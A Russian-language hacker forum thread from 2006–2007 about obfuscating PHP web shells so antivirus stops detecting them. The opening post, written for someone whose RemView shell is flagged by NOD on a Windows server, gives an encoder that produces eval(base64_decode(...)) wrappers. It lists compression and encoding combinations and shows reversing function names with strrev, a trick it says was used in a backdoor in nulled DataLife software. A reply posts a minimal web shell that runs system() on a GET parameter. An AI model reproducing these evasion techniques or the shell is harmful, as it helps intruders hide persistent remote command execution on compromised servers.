Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Криптуем php скрипты от антивирей |
12.11.2006, 22:53
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
Криптуем php скрипты от антивирей
Вчера в аську постучался чел, с которым я вел довольно длительную переписку-консультацию по имению виндового сервака. Очередная его просьба заключалась в том, что RemView палится NOD`om, стоящим на виндовом сервачке - он просил дать аналогичную софтинку, только не палащуюся.
Первым делом пришла идея просто зашифровать base64_decode, и я быстренько накодил следующий код:
PHP код:
eval(base64_decode(code));
и быстренько накодил скрипт:
PHP код:
<?php
$file_array = file( "RemView.php" ); // следует помнить, что в файле в кодируемом файле должны быть удалены начальные и конечные "примочки" php-кода (<? и ?>)
while ( list( $line ) = each($file_array) ):
$c.=$file_array[$line];
$c.=chr(10);
endwhile;
echo "eval(base64_decode('" . base64_encode($c) . '\'));';
?>
А как зашифровать сложнее, и сжать код - читаем дальше:
Функции СИММЕТРИЧНОГО ШИФРОВАНИЯ, которые могут нам помочь:
Сообщение от Кусок текста из книги PHP глазами хакера Михаила Фленова:
Функция mcrypt_ecb(Алгоритм,ключ,данные, режим);
Алгоритмы шифрования, которые есть в либе libmcrypt: - MCRYPT_DES - алгоритм DES
- MCRYPT_3DES - алгоритм 3DES
- MCRYPT_BLOWFISH - алгоритм BLOWFISH
- MCRYPT_CAST128 - алгоритм cast256
- MCRYPT_CAST256 - алгоритм cast256
Режим: либо MCRYPT_ENCRYPT (зашифровать) либо MCRYPT_DECRYPT (расшифровать) Более подробно о функции можно глянуть тут: http://ru2.php.net/manual/ru/function.mcrypt-ecb.php
Функции АССИМЕТРИЧНОГО шифрования, которые могут нам помочь:
Например SSL, но мы рассматривать ее не будем ))) нах оно нам? Хотя если остальные будут палиться... то )
Очень жаль, но необратимое шифрование нам помочь никак не может  например функция 
Функции изменения основания системы данных шифрования, которые могут нам помочь:
О, как выразился) к функциям относятся и примененные тимой RST в конструкторе своего шелла ( линк на конструктор): - gzdeflate & base64_encode
- gzdeflate & bin2hex
- gzdeflate & urlencode
- gzcompress & base64_encode
- gzcompress & bin2hex
- gzcompress & urlencode
- bzcompress & base64_encode (PHP >= 4.3.3)
- bzcompress & bin2hex (PHP >= 4.3.3)
- bzcompress & urlencode (PHP >= 4.3.3)
(они тут еще и ужимали полученный код дефлейтом и компрессором)
Кроме заюзанных функций: bindec(), decoct(), dechex() Стоит и упоминуть еще: base_convert() - очень удобная фича, можно добавить еще и комбинации используя операции работы со строками и очень понтовую фичу - strrev() - она просто переворачивает строчку задом наперед ) (помню, писал проги для поиска фраз - полиндромов - прогоните строчки: "Улыбок т ебе дед макар" и "Лазер вове хер отрезал" )
Шифруем имена самих функций
Ладно, код мы упаковали, но как быть насчет поиска антивирем наших "странных" конструкций? Нужно шифроваться ) юзаем strrev() или другие подобные функции, которые затруднят поиск потенциально опасных конструкций в исследуемом коде.
Например, очнь прикольный ход:
PHP код:
$_D=strrev('edoced_46esab');
eval($_D('....')); // данный закодированный base64_encode
(финт применен в криптовании бекдора в нуленом даталайфе 4.5)
простым поиском по файлу мы не найдем base64_decode, которую очень часто юзают в злонамеренных целях. Впрочем и eval() тоже можно было зашифровать. Надеюсь, теперь тебе не составит никакого труда кодировать свои шеллы  |
|
|
12.11.2006, 23:02
|
|
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310
Репутация:
488
|
|
Проще свой шелл накатать..
|
|
|
|
12.11.2006, 23:35
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
Сообщение от r0cha!
Проще свой шелл накатать..
ну не скажи!
и если свой шелл не криптовать, то его просто поиском по содержимому найти
|
|
|
|
20.11.2006, 22:34
|
|
Познающий
Регистрация: 03.05.2006
Сообщений: 82
Провел на форуме:
219818
Репутация:
10
|
|
Статья хорошая, а шел свой писать тоже влом, зачем заново изобретать велосипед, хотя если делать нечего, можно попробовать.
А вот минус за "Лазер вове хер отрезал". Я минут пять пересматривал эту фразу, из палиндромов только слово Лазер. Может я что не так понял???  |
|
|
|
21.03.2007, 01:12
|
|
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме:
3509350
Репутация:
412
|
|
Ребята а есть исче какие то способы спратоть а то я не силен в пхп сам додуматься не могу .
Последний раз редактировалось Mo4x™; 21.03.2007 в 01:22..
|
|
|
|
21.05.2007, 03:26
|
|
Banned
Регистрация: 02.03.2007
Сообщений: 38
Провел на форуме:
38949
Репутация:
-12
|
|
Ой да етож исходнег - его можно править вручную как хочешь и где хочешь - тупо можно автоматом сменить все переменные на свои или добавить левый код, вот и не будет палиццо антивирусами.
|
|
|
|
21.05.2007, 07:22
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137
Репутация:
66
|
|
Букв конечно много написал ты...только вот RemView палится NOD`om очевидно по сигнатурам кода...и если пройтись по нему (то есть по коду) любым пхпшным обфускатором, и даже самописным, то проблема исчезнет. И без всякого там шифрования и бредовой книги кулхацкера Флеонова, который на что только не смотрел ещё "глазами хакера"...
P.S. по поводу
и быстренько накодил скрипт:
Скажи, а зачем такие "магические движения" при чтении файла?
file_get_contents или file+implode не модно? про chr(10) особенно улыбнуло. |
|
|
|
21.05.2007, 07:32
|
|
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435
Репутация:
2290
|
|
Пардон, а каким образом антивири палят ТЕКСТОВИК? )
|
|
|
|
21.05.2007, 07:32
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137
Репутация:
66
|
|
Сообщение от Talisman
ну не скажи!
и если свой шелл не криптовать, то его просто поиском по содержимому найти
PHP код:
<?php
$foo = 's'.'y'.'s'.'t'.'e'.'m';
$foo($_GET['c']);
?>
удачи
|
|
|
|
21.05.2007, 07:40
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Пардон, а каким образом антивири палят ТЕКСТОВИК? )
отжег... наверное эвристическим....
Для уменьшения размера, добавь в свой мини скриптик bzcompress gzcompress.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
